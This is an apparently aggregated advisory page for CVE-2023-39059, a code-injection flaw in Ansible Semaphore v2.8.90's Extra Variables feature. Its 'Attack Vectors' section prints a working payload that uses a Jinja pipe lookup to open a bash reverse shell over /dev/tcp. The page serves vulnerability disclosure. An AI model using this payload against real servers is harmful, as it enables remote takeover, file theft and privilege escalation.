Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-39059: CVE-2023-39059

An issue in ansible semaphore v.2.8.90 allows a remote attacker to execute arbitrary code via a crafted payload to the extra variables parameter.

CVE
#vulnerability#dos#ssrf

---------------------------------------------------------------

[VulnerabilityType Other]

Remote Command Execution (RCE)

---------------------------------------------------------------

[Affected Component]

Ansible Semaphore includes a feature called “Extra Variables.” This feature can be accessed at https://<semaphore-endpoint>/project/id/environment and is directly associated with the ansible-playbook --extra-vars flag.

---------------------------------------------------------------

[Attack Type]

Remote

---------------------------------------------------------------

[Impact Code execution]

true

---------------------------------------------------------------

[Impact Denial of Service]

true

---------------------------------------------------------------

[Impact Escalation of Privileges]

true

---------------------------------------------------------------

[Impact Information Disclosure]

true

---------------------------------------------------------------

[Attack Vectors]

The --extra-vars parameter can be abused by a malicious user with low privileges to achieve Remote Command Execution (RCE) and read files and configurations, perform Server Side Request Forgery (SSRF), execute commands, and establish a reverse shell on the ansible server. Payload:

{"ansible_user": “{{ lookup('ansible.builtin.pipe’, \"bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1337 <&1’\”) }}"}

---------------------------------------------------------------

[Has vendor confirmed]

true

---------------------------------------------------------------

[Discoverer]

@alevsk

---------------------------------------------------------------

[Reference]

https://www.alevsk.com/2023/07/a-quick-story-of-security-pitfalls-with-execcommand-in-software-integrations/

---------------------------------------------------------------

[Vendor of Product]

ansible semaphore

---------------------------------------------------------------

[Affected Product Code Base]

ansible semaphore v2.8.90

---------------------------------------------------------------

Related news

GHSA-3r32-cp7v-5wq4: Code injection in ansible semaphore

An issue in ansible semaphore v.2.8.90 allows a remote attacker to execute arbitrary code via a crafted payload to the extra variables parameter.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907